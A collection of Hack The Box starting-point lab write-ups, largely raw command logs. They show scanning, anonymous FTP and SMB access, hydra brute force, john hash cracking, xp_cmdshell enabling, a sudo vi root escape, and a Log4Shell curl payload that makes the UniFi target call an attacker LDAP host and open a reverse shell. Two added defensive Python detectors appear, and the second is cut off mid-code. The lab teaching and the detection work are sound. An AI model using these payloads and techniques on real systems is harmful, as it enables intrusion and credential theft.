```
# Nmap 7.92 scan initiated Sun Apr 17 18:38:58 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.129.157.43
Nmap scan report for 10.129.157.43
Host is up (0.023s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 18:39:29 2022 -- 1 IP address (1 host up) scanned in 31.56 seconds
```
```
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Meow:~# cat flag.txt
edited
```
```
# Nmap 7.92 scan initiated Sun Apr 17 18:51:32 2022 as: nmap -sSVC -p- -T4 -v -oA fawn 10.129.6.54
Nmap scan report for 10.129.6.54
Host is up (0.018s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.190
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 18:51:45 2022 -- 1 IP address (1 host up) scanned in 13.15 seconds
```
There is only an FTP server, and it allows anonymous connections.

```
$ ftp 10.129.6.54
Connected to 10.129.6.54.
220 (vsFTPd 3.0.3)
Name (10.129.6.54:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00133 seconds (23.6 kbytes/s)
ftp> quit
221 Goodbye.
```
```
# Nmap 7.92 scan initiated Sun Apr 17 19:08:43 2022 as: nmap -sSVC -p- -T4 -v -oA dancing 10.129.176.22
Nmap scan report for 10.129.176.22
Host is up (0.018s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 19:10:09 2022 -- 1 IP address (1 host up) scanned in 85.24 seconds
```
```
 =====================================
|    Service Scan on 10.129.176.22    |
 =====================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ==========================================
|    RPC Session Check on 10.129.176.22    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[-] Could not establish random user session: STATUS_INVALID_PARAMETER

 ====================================================
|    Domain Information via RPC for 10.129.176.22    |
 ====================================================
[-] Could not get domain information via 'lsaquery': STATUS_ACCESS_DENIED

 ============================================================
|    Domain Information via SMB session for 10.129.176.22    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DANCING
NetBIOS domain name: ''
DNS domain: Dancing
FQDN: Dancing

 =======================================
|    Shares via RPC on 10.129.176.22    |
 =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

Completed after 3.15 seconds
```
```
$ smbmap -H 10.129.176.22 --no-banner

[+] IP: 10.129.176.22:445	Name: 10.129.176.22          	Status: Authenticated
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
```
In fact it only refuses the null session (empty username), so we can give any other username with no password and list a few shares:
```
$ smbclient -L 10.129.176.22 -U 'noraj' -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      
SMB1 disabled -- no workgroup available
```
```
# Nmap 7.92 scan initiated Sun Apr 17 19:48:49 2022 as: nmap -sSVC -p- -T4 -v -oA appointment 10.129.92.59
Nmap scan report for 10.129.92.59
Host is up (0.017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Login
|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 19:49:07 2022 -- 1 IP address (1 host up) scanned in 18.30 seconds
```
```
# Nmap 7.92 scan initiated Sun Apr 17 20:26:01 2022 as: nmap -sSVC -p- -T4 -v -oA sequel 10.129.94.61
Nmap scan report for 10.129.94.61
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, SupportsTransactions, SupportsLoadDataLocal, Speaks41ProtocolOld, InteractiveClient, DontAllowDatabaseTableColumn, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: v`]3#Ubp*|Vy~/jLy@p5
|_  Auth Plugin Name: mysql_native_password
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 20:29:33 2022 -- 1 IP address (1 host up) scanned in 212.46 seconds
```
```
$ mysql -h 10.129.94.61 -u root
...
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.019 sec)

MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.017 sec)
```
```
# Nmap 7.92 scan initiated Sun Apr 17 21:18:17 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/crocodile 10.129.10.200
Nmap scan report for 10.129.10.200
Host is up (0.016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.190
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: 1248E68909EAE600881B8DB1AD07F356
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 17 21:18:36 2022 -- 1 IP address (1 host up) scanned in 19.01 seconds
```
```
$ ftp 10.129.85.38
Connected to 10.129.85.38.
220 (vsFTPd 3.0.3)
Name (10.129.85.38:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
226 Transfer complete.
33 bytes received in 7.6e-05 seconds (424 kbytes/s)
ftp> get allowed.userlist.passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
226 Transfer complete.
62 bytes received in 0.00109 seconds (55.3 kbytes/s)
ftp> quit
221 Goodbye.
```
Those are a list of users and a list of passwords:

So let's use the two lists to brute-force our way into the login form (the last field of the http-post-form string, `Warning!`, is the text hydra treats as a failed login).
```
$ hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.85.38 http-post-form "/login.php:Username=^USER^&Password=^PASS^&Submit=Login:Warning\!"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-18 14:22:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking http-post-form://10.129.85.38:80/login.php:Username=^USER^&Password=^PASS^&Submit=Login:Warning!
[80][http-post-form] host: 10.129.85.38   login: admin   password: rKXM59ESxesUFHAd
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-18 14:22:55
```
```
# Nmap 7.92 scan initiated Mon Apr 18 14:37:29 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/responder 10.129.79.102
Nmap scan report for 10.129.79.102
Host is up (0.020s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open  pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 18 14:40:05 2022 -- 1 IP address (1 host up) scanned in 156.59 seconds
```
```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=netntlmv2
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)
1g 0:00:00:00 DONE (2022-04-18 15:57) 1.063g/s 4357p/s 4357c/s 4357C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
```
# Nmap 7.92 scan initiated Mon Apr 18 16:39:49 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/archetype 10.129.239.121
Nmap scan report for 10.129.239.121
Host is up (0.019s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-04-18T14:11:03
| Not valid after:  2052-04-18T14:11:03
| MD5:   9fd9 4a91 0d78 15c9 22aa 2e19 1b1a aec2
|_SHA-1: e937 370f 6283 2e8c da73 cdc2 43a5 cebe daf5 b993
|_ssl-date: 2022-04-18T14:41:17+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb2-time: 
|   date: 2022-04-18T14:41:08
|_  start_date: N/A
| ms-sql-info: 
|   10.129.239.121:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-04-18T07:41:11-07:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 18 16:41:17 2022 -- 1 IP address (1 host up) scanned in 87.78 seconds
```
```
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 

SQL> SELECT @@version
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) 
	Aug 22 2017 17:04:49 
	Copyright (C) 2017 Microsoft Corporation
	Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

SQL> SELECT HOST_NAME()
VzIpejXi
```
Listing the tables, it doesn't look like we'll find any interesting secrets, but enumerating our permissions shows we have full admin access.
```
SQL> SELECT DB_NAME()
master

SQL> SELECT is_srvrolemember('sysadmin');
1

SQL> SELECT is_srvrolemember('serveradmin');
1

SQL> SELECT is_srvrolemember('securityadmin');
1
```
This will allow us to execute commands with xp_cmdshell.
```
     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
```

```
SQL> xp_cmdshell whoami
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
```
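A defender-side counterpart to the enable_xp_cmdshell output above, added here as an example that is not part of the original writeup: the two sp_configure messages it prints are also recorded in the SQL Server ERRORLOG, and this Python snippet parses ERRORLOG lines in that shape (the sample lines are constructed) and alerts when a code-execution option such as xp_cmdshell is switched on, rating a 'show advanced options' change followed by 'xp_cmdshell' from the same spid as high severity.

```python
import re
from collections import defaultdict

# Constructed sample SQL Server ERRORLOG lines (not from the original writeup). The message
# text is the one enable_xp_cmdshell prints, in the ERRORLOG's "date spid message" layout.
SAMPLE_ERRORLOG = """\
2022-04-18 07:44:58.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-04-18 07:44:58.13 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-04-18 07:50:03.40 spid62      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2022-04-18 08:02:11.07 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-04-18 08:05:44.90 spid70      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# sp_configure options that turn on OS-level or out-of-process code execution from T-SQL.
CODE_EXEC_OPTIONS = {
    "xp_cmdshell", "Ole Automation Procedures", "clr enabled", "Ad Hoc Distributed Queries",
}


def parse_config_changes(text):
    """Parse ERRORLOG text into dicts; lines that are not configuration changes are skipped."""
    events = []
    for line in text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            d = m.groupdict()
            d["old"], d["new"] = int(d["old"]), int(d["new"])
            events.append(d)
    return events


def detect(events):
    """Return (timestamp, spid, option, severity) alerts for code-execution options being enabled.

    Severity is "high" when the same spid turned 'show advanced options' on earlier
    (the sp_configure sequence enable_xp_cmdshell sends), "medium" otherwise.
    Disabling an option (new == 0) or changing an unrelated option produces no alert.
    """
    advanced_on = defaultdict(bool)
    alerts = []
    for e in events:
        if e["option"] == "show advanced options":
            advanced_on[e["spid"]] = e["new"] == 1
            continue
        if e["option"] in CODE_EXEC_OPTIONS and e["old"] == 0 and e["new"] == 1:
            severity = "high" if advanced_on[e["spid"]] else "medium"
            alerts.append((e["ts"], e["spid"], e["option"], severity))
    return alerts


if __name__ == "__main__":
    for ts, spid, option, sev in detect(parse_config_changes(SAMPLE_ERRORLOG)):
        print(f"[{sev}] {ts} {spid}: '{option}' enabled")
```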
```
$ ftp 10.129.109.17
Connected to 10.129.109.17.
220 (vsFTPd 3.0.3)
Name (10.129.109.17:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00196 seconds (1.23 Mbytes/s)
ftp> quit
221 Goodbye.
```
```
$ zip2john backup.zip > hash.txt
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1g 0:00:00:01 DONE (2022-04-20 20:43) 0.9803g/s 8031p/s 8031c/s 8031C/s 123456..total90
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)
1g 0:00:00:01 DONE (2022-04-20 20:57) 0.8547g/s 85661p/s 85661c/s 85661C/s roses12..poepje
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```
```
$ socat -d -d TCP-LISTEN:9999 STDOUT
2022/04/20 21:21:27 socat[10413] N listening on AF=2 0.0.0.0:9999
2022/04/20 21:25:29 socat[10413] N accepting connection from AF=2 10.129.109.17:35402 on AF=2 10.10.15.186:9999
2022/04/20 21:25:29 socat[10413] N using stdout for reading and writing
2022/04/20 21:25:29 socat[10413] N starting data transfer loop with FDs [6,6] and [1,1]
postgres@vaccine:/var/lib/postgresql/11/main$ id
uid=111(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
postgres@vaccine:/var/lib/postgresql$ cat user.txt
edited
```
These are the DB credentials; let's hope the same password is used for PAM, which is generally the case for DB system accounts.
Let's connect over SSH for a more stable connection.
```
$ ssh postgres@10.129.109.17
```
We can execute vi as root.
```
postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
We could use the `-c` option here, but of course we can also just launch vi and then run `:!/bin/bash` from inside it.
```
$ gtfoblookup gtfobins search -c sudo vi
vi:
  sudo:
    Code: sudo vi -c ':!/bin/sh' /dev/null
```
```
root@vaccine:/var/lib/postgresql# id
uid=0(root) gid=0(root) groups=0(root)
root@vaccine:/var/lib/postgresql# cat /root/root.txt
edited
```
```
# Nmap 7.92 scan initiated Sat Apr 23 16:21:10 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/unified 10.129.38.1
Nmap scan report for 10.129.38.1
Host is up (0.027s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: ...
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Sat, 23 Apr 2022 14:21:34 GMT
|     Connection: close
|   RTSPRequest, Socks5: ...
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://10.129.38.1:8443/manage
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-30T21:37:24
| Not valid after:  2024-04-03T21:37:24
| MD5:   e6be 8c03 5e12 6827 d1fe 612d dc76 a919
|_SHA-1: 111b aa11 9cca 4401 7cec 6e03 dc45 5cfe 65f6 d829
8843/tcp open  ssl/unknown
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: ...
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-30T21:37:24
| Not valid after:  2024-04-03T21:37:24
| MD5:   e6be 8c03 5e12 6827 d1fe 612d dc76 a919
|_SHA-1: 111b aa11 9cca 4401 7cec 6e03 dc45 5cfe 65f6 d829
8880/tcp open  cddbp-alt?
| fingerprint-strings: 
|   FourOhFourRequest: ...
|   GetRequest: ...
|   HTTPOptions: ...

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 23 16:24:21 2022 -- 1 IP address (1 host up) scanned in 191.08 seconds
```
The Morphisec post doesn't go into much detail and quotes the Sprocket Security article anyway, so let's look at the original article.
> In this article, we are going to exploit Log4j vulnerabilities in Unifi software, get a reverse shell, and leverage our access to add our own administrative user to the Unifi MongoDB instance.
>
> To automate this process we have released a GitHub repository to exploit the vulnerability: https://github.com/puzzlepeaches/Log4jUnifi
```
$ curl -i -s -k -X POST --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://10.10.15.146:1389/o=tomcat}\",\"strict\":true}' https://10.129.38.1:8443/api/login
```
We just receive the connection:
```
$ socat -d -d TCP-LISTEN:9999 STDOUT
2022/04/23 19:28:20 socat[19669] N listening on AF=2 0.0.0.0:9999
2022/04/23 19:35:56 socat[19669] N accepting connection from AF=2 10.129.38.1:48890 on AF=2 10.10.15.146:9999
2022/04/23 19:35:56 socat[19669] N using stdout for reading and writing
2022/04/23 19:35:56 socat[19669] N starting data transfer loop with FDs [6,6] and [1,1]
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
```
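As an added example (not part of the original post or of the Log4jUnifi project), the following Python snippet shows how a defender can spot the kind of payload sent in the `remember` field above in request logs, including the nested `${lower:..}` and `${..:-..}` lookups commonly used to disguise `${jndi:...}`; the log lines are constructed for the example and only mimic the shape of a UniFi `/api/login` request log.

```python
import re

# Constructed sample log lines (not from the original post): a request-body log of the
# UniFi /api/login endpoint plus user-agent fields, in the shape of the payload above.
SAMPLE_LOG_LINES = [
    '10.129.38.1 - [23/Apr/2022:19:35:50 +0000] "POST /api/login" body={"username":"a","password":"a","remember":"${jndi:ldap://10.10.15.146:1389/o=tomcat}","strict":true}',
    '10.0.0.5 - [23/Apr/2022:19:36:01 +0000] "POST /api/login" body={"username":"alice","password":"***","remember":"true","strict":true}',
    '10.0.0.9 - [23/Apr/2022:19:36:10 +0000] "GET /manage" ua="${${lower:j}${lower:n}di:ldap://198.51.100.7/a}"',
    '10.0.0.9 - [23/Apr/2022:19:36:12 +0000] "GET /manage" ua="${${env:NaN:-j}ndi:${lower:RMI}://198.51.100.7/b}"',
    '10.0.0.7 - [23/Apr/2022:19:36:20 +0000] "GET /manage" ua="Mozilla/5.0 (X11; Linux x86_64) ${date:yyyy}"',
]

# ${lower:x} / ${upper:x} lookups with no nested braces inside them.
CASE_LOOKUP = re.compile(r'\$\{\s*(lower|upper)\s*:([^${}]*)\}', re.IGNORECASE)
# ${anything:-default} lookups (env, sys, date, ...) whose default value is taken verbatim.
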